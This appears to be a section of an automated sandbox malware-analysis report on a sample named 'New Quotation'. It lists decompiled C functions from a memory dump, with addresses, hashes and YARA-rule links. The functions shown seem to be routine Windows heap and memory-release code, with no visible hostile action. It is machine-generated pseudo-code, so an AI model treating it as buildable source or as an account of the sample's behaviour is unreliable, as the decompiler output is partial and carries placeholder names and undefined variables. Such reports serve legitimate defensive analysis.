				if( *((intOrPtr*)(__ecx + 0x14)) != 0) {
					_push( *((intOrPtr*)(__ecx + 0x14)));
					E1D8130B0();
				} else {
					if( *((intOrPtr*)(__ecx + 8)) != 0) {
						_push(0);
						_push( *((intOrPtr*)(__ecx + 8)));
						E1D812A70();
					}
				}
				return E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t11);
			}




                                                                                                                                                                                          0x1d7c8c40
                                                                                                                                                                                          0x1d7c8c46
                                                                                                                                                                                          0x1d82b645
                                                                                                                                                                                          0x1d82b648
                                                                                                                                                                                          0x1d7c8c4c
                                                                                                                                                                                          0x1d7c8c50
                                                                                                                                                                                          0x1d7c8c65
                                                                                                                                                                                          0x1d7c8c67
                                                                                                                                                                                          0x1d7c8c6a
                                                                                                                                                                                          0x1d7c8c6a
                                                                                                                                                                                          0x1d7c8c50
                                                                                                                                                                                          0x1d7c8c64

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
                                                                                                                                                                                          • Instruction ID: 1477d1a7d7de25b991d859df9a0f92a068fc63dfddbfebfaf9f63ecebbba3e5f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43E08C35046A52EECB325A04ED04F5276F1BB00B31F1289AFA20A094B0CB78F888DA47
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D88AF50 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D88AF50(void* __ecx, void* __edx, signed int _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = E1D7CCEF0(__ecx, _a4, 0xfff);
					E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                                                                                                                          0x1d88af5a
                                                                                                                                                                                          0x1d88af6b
                                                                                                                                                                                          0x1d88af81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88af86
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f4cd88530dd3f0f8e41e96be52a138f2b45fedd8713a678cead4cc63096fcc42
                                                                                                                                                                                          • Instruction ID: c453aca4ebfc1998a148eaa49d2011a9d5134e1da414da839df51687ae27a813
                                                                                                                                                                                          • Opcode Fuzzy Hash: f4cd88530dd3f0f8e41e96be52a138f2b45fedd8713a678cead4cc63096fcc42
                                                                                                                                                                                          • Instruction Fuzzy Hash: 68E0C231288209BBDB220B40DC00F66BB19EB50BE1F114031FA086AAE0CA71EC91D7C5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D1F70 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7D1F70(signed int __edx, signed int _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t6;
				void* _t10;
				void* _t15;
				void* _t17;

				_t16 = _a4;
				E1D7D491F( *((intOrPtr*)(_a4 + 0x5c)), __edx | 0xffffffff);
				E1D7D254C(_t10, _a4, _t15, _t16, _t17);
				_t6 =  *0x1d8c6644; // 0x0
				return E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t6 + 0x100000, _t16);
			}









                                                                                                                                                                                          0x1d7d1f76
                                                                                                                                                                                          0x1d7d1f7f
                                                                                                                                                                                          0x1d7d1f86
                                                                                                                                                                                          0x1d7d1f8b
                                                                                                                                                                                          0x1d7d1fa7

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 20d3988d41f5e6e66e0cd355586cf9cebeacd55ed07e992e585101529e5af672
                                                                                                                                                                                          • Instruction ID: 0a3c4f14875ac3ed7c78149e3bdfd7f9252b5f6b565c138a1db6884acc1e3ace
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20d3988d41f5e6e66e0cd355586cf9cebeacd55ed07e992e585101529e5af672
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EE0C232104954ABC311EB5DEC51F9A73AEEF842B4F110120F256876B0CB20FD01C7A5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D858F3C Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D858F3C() {
				signed int _t9;
				signed int* _t13;

				_t9 =  *0x1d8c5a74; // 0x0
				if((_t9 & 0x00000001) == 0) {
					if((_t9 & 0x00008000) != 0) {
						 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) | 0x02000000;
					}
				} else {
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) | 0x02000000;
					_t13 =  *0x1d8c3738; // 0x773f46bc
					 *_t13 =  *_t13 | 0x00000001;
				}
				return 1;
			}





                                                                                                                                                                                          0x1d858f3c
                                                                                                                                                                                          0x1d858f43
                                                                                                                                                                                          0x1d858f6c
                                                                                                                                                                                          0x1d858f85
                                                                                                                                                                                          0x1d858f85
                                                                                                                                                                                          0x1d858f45
                                                                                                                                                                                          0x1d858f5a
                                                                                                                                                                                          0x1d858f5d
                                                                                                                                                                                          0x1d858f62
                                                                                                                                                                                          0x1d858f62
                                                                                                                                                                                          0x1d858f8a

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 11a1d336dd2b737b04eb72668d8bea6e3f35a74333fd020e59d78c1383425276
                                                                                                                                                                                          • Instruction ID: 3eacb9fbf35a058ca4d793970aec09d25a5bcf78c5dc2cd3d755564c6ba86cd7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 11a1d336dd2b737b04eb72668d8bea6e3f35a74333fd020e59d78c1383425276
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0ED78661A84CFE716CF05C1E2F5173BAF749B80F504459E4468BBA1C739ED42CE40
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8089B0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D8089B0(intOrPtr _a4, signed int _a8) {
				signed int _t6;
				signed int _t11;
				intOrPtr _t13;

				_t13 = _a4;
				_t6 =  *(_t13 + 0x14);
				_t11 = (_t6 ^ _a8) & 0x00ffffff ^ _t6;
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t11 = _t11 & 0xff000000;
				}
				 *(_t13 + 0x14) = _t11;
				return _t6 & 0x00ffffff;
			}






                                                                                                                                                                                          0x1d8089bd
                                                                                                                                                                                          0x1d8089c0
                                                                                                                                                                                          0x1d8089ce
                                                                                                                                                                                          0x1d8089d4
                                                                                                                                                                                          0x1d8089e3
                                                                                                                                                                                          0x1d8089e3
                                                                                                                                                                                          0x1d8089d6
                                                                                                                                                                                          0x1d8089e0

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                                          • Instruction ID: 134888dfe8af9b541561aaada14044e6f8c29db12b121205291ff1fda8df78be
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 77E04F33521A1887C715EE14D9126767BA4FB45720B05422AA55347781C534E544C69A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7E3C20 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E1D7E3C20(void* __ecx) {
				signed char _t8;

				_t8 =  *0x1d8c6834; // 0x0
				if((_t8 & 0x00000001) != 0) {
					if((_t8 & 0x00000002) == 0 ||  *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						_push( *0x1d8c446c);
						return 0 | __ecx !=  *((intOrPtr*)(E1D899682( *0x1d8c4468)));
					}
				} else {
					L1:
					return 0;
				}
			}




                                                                                                                                                                                          0x1d7e3c20
                                                                                                                                                                                          0x1d7e3c29
                                                                                                                                                                                          0x1d8369f9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d836a0f
                                                                                                                                                                                          0x1d836a0f
                                                                                                                                                                                          0x1d836a29
                                                                                                                                                                                          0x1d836a29
                                                                                                                                                                                          0x1d7e3c2f
                                                                                                                                                                                          0x1d7e3c2f
                                                                                                                                                                                          0x1d7e3c31
                                                                                                                                                                                          0x1d7e3c31

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1850f95355287c1787ca27fe5afddc294f8a5b4f50d332ffe453bb78e5177998
                                                                                                                                                                                          • Instruction ID: 8cdaecd554a9afc8d758a775902dba0c2da306f7ec5c65a6843bda5a4b2491c3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1850f95355287c1787ca27fe5afddc294f8a5b4f50d332ffe453bb78e5177998
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3E01271602451CBCB069B1CC991FA53372EF896D6F120475E44287574C734E891EA41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D1E70 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7D1E70(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t10;
				void* _t12;
				void* _t14;
				void* _t15;

				_t11 = _a4;
				if(_a4 == 0 || _a8 != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					E1D8A4A6D(_t10, _t11, _t12, _t14, _t15);
					return 0xc000000d;
				} else {
					return E1D7D37E4(_t10, _t11, 0, _t14, _t15, 0);
				}
			}








                                                                                                                                                                                          0x1d7d1e75
                                                                                                                                                                                          0x1d7d1e7a
                                                                                                                                                                                          0x1d7d1e9c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d1e91
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d1e93

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 7593eabf9654e90afe5080e6b013f0cdba9182d155996e74a4ef26fcbd0a9835
                                                                                                                                                                                          • Instruction ID: af82d9a4af29b07e2a64a7599a3d05c7d333ee0314a615c1b9a4f119a17c17dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7593eabf9654e90afe5080e6b013f0cdba9182d155996e74a4ef26fcbd0a9835
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1E0C239304B888FD780EB19F084F35B3956B80A31F06C21EEC0C4B511C738E880DA03
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D809CCF Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D809CCF(void* __eax, signed int __edi, void* __esi) {
				void* _t4;
				intOrPtr _t5;
				signed int _t9;
				void* _t13;

				_t9 = __edi;
				_t4 = __eax;
				if( *((intOrPtr*)(_t13 - 0x38)) != 0 || __esi < 0) {
					if(_t9 != 0) {
						_t5 =  *0x1d8c6644; // 0x0
						return E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t5 + 0x80000, _t9);
					}
				}
				return _t4;
			}







                                                                                                                                                                                          0x1d809ccf
                                                                                                                                                                                          0x1d809ccf
                                                                                                                                                                                          0x1d809cd3
                                                                                                                                                                                          0x1d845fdf
                                                                                                                                                                                          0x1d845fe5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d846001
                                                                                                                                                                                          0x1d845fdf
                                                                                                                                                                                          0x1d809ce1

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f72fdee6d93605d3bfe3e14bb7db1c51564a46e602f69a2c03eb119834bb736a
                                                                                                                                                                                          • Instruction ID: 93577334edb1846bfd8184a13733432b04bce30240c65560b97f4a4042e70bf4
                                                                                                                                                                                          • Opcode Fuzzy Hash: f72fdee6d93605d3bfe3e14bb7db1c51564a46e602f69a2c03eb119834bb736a
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7D05E32C04458FBCB529B08CD81F2A76B4FF80B14F2A4094A846A3A20C338F814CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D3E01 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7D3E01(void* __eax, void* __edi, signed int __esi) {
				void* _t4;
				intOrPtr _t5;
				signed int _t11;
				void* _t13;

				_t11 = __esi;
				_t4 = __eax;
				if( *((intOrPtr*)(_t13 - 0x24)) != 0 || __edi < 0) {
					if(_t11 != 0) {
						_t5 =  *0x1d8c6644; // 0x0
						return E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t5 + 0x200000, _t11);
					}
				}
				return _t4;
			}







                                                                                                                                                                                          0x1d7d3e01
                                                                                                                                                                                          0x1d7d3e01
                                                                                                                                                                                          0x1d7d3e05
                                                                                                                                                                                          0x1d82ffa2
                                                                                                                                                                                          0x1d82ffa8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82ffc4
                                                                                                                                                                                          0x1d82ffa2
                                                                                                                                                                                          0x1d7d3e13

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 2b86bb519df7528e1e0ce3cc032af04bd3ac1c68d2f527b450f4493719fff90d
                                                                                                                                                                                          • Instruction ID: dc6f9fd7ae1047e3b53df3b6917626bfee7c59bce4253d583d79de6bf1e3b439
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b86bb519df7528e1e0ce3cc032af04bd3ac1c68d2f527b450f4493719fff90d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AD05E33C01A20DFC762CB44CA81F6A77B5EF48F64F920098E445A3665C738EC50C795
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D826912 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D826912(void* __ecx) {
				void* _t6;
				void* _t8;
				void* _t11;

				_t11 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x30)) != 0) {
					_t8 = E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(__ecx + 0x24)));
					 *((intOrPtr*)(_t11 + 0x24)) = 0;
					 *((intOrPtr*)(_t11 + 0x14)) = 0;
					return _t8;
				}
				return _t6;
			}






                                                                                                                                                                                          0x1d826915
                                                                                                                                                                                          0x1d82691d
                                                                                                                                                                                          0x1d82692c
                                                                                                                                                                                          0x1d826931
                                                                                                                                                                                          0x1d826934
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d826934
                                                                                                                                                                                          0x1d826939

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
                                                                                                                                                                                          • Instruction ID: 95ea4305c6236e3cec6b082b12669267384a6985562f2d8fb63d3b80e288ba3b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7D05B36501A409FC7314F17E904D23B7F5FBC4A51701056EA54543920C671E841CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80CE70 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D80CE70(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				void* __ebp;
				intOrPtr _t5;

				E1D7D254C(__ebx, _a4, __edi, __esi, __eflags);
				_t5 =  *0x1d8c6644; // 0x0
				return E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t5 + 0x200000, _a4);
			}





                                                                                                                                                                                          0x1d80ce78
                                                                                                                                                                                          0x1d80ce80
                                                                                                                                                                                          0x1d80ce9a

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: dea5242c6248433d1fedadda1b58b0232f53f8d67adc700d13dfee086897dc0a
                                                                                                                                                                                          • Instruction ID: d235533481a9cc6633470dad92fcfca14c39526fc12265b8036374360651f34a
                                                                                                                                                                                          • Opcode Fuzzy Hash: dea5242c6248433d1fedadda1b58b0232f53f8d67adc700d13dfee086897dc0a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C2D0A732000204ABC711DF08DC91F157B69EF94764F010020B50947232C630FD61CA54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80C944 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D80C944(void* __eax, signed int __ecx, void* __esi) {
				void* _t4;
				signed int _t8;
				void* _t10;

				_t8 = __ecx;
				_t4 = __eax;
				if( *((intOrPtr*)(_t10 - 0x24)) != __esi || __eax < 0) {
					if(_t8 != 0) {
						E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)),  *0x1d8c6644, _t8);
						return  *((intOrPtr*)(_t10 - 0x1c));
					}
				}
				return _t4;
			}






                                                                                                                                                                                          0x1d80c944
                                                                                                                                                                                          0x1d80c944
                                                                                                                                                                                          0x1d80c947
                                                                                                                                                                                          0x1d84822c
                                                                                                                                                                                          0x1d848242
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d848247
                                                                                                                                                                                          0x1d84822c
                                                                                                                                                                                          0x1d80c955

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 3bbb948d4e8b630221d741711802bea3d2c61f62fe8d198f60b8464f914f6009
                                                                                                                                                                                          • Instruction ID: e7563bc6e90b5f62e8ae35c2319b76f74afd61d580a77d9b1fa23e16d6a3916c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bbb948d4e8b630221d741711802bea3d2c61f62fe8d198f60b8464f914f6009
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED0A734511516DBCF068F00CA44F7D7378FF08740F024068F50152420D328DC00C741
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80CE3F Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D80CE3F(signed int __ecx) {
				void* _t6;
				intOrPtr _t7;
				intOrPtr _t11;

				if(__ecx != 0) {
					_t7 =  *0x1d8c6644; // 0x0
					 *(__ecx + 4) =  *(__ecx + 4) | 0x00000004;
					E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t7 + 0x2c0000, __ecx);
					_t11 =  *[fs:0x18];
					 *(_t11 + 0xf90) =  *(_t11 + 0xf90) & 0x00000000;
					return _t11;
				}
				return _t6;
			}






                                                                                                                                                                                          0x1d80ce41
                                                                                                                                                                                          0x1d80ce43
                                                                                                                                                                                          0x1d80ce48
                                                                                                                                                                                          0x1d80ce5c
                                                                                                                                                                                          0x1d80ce61
                                                                                                                                                                                          0x1d80ce67
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80ce67
                                                                                                                                                                                          0x1d80ce6e

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
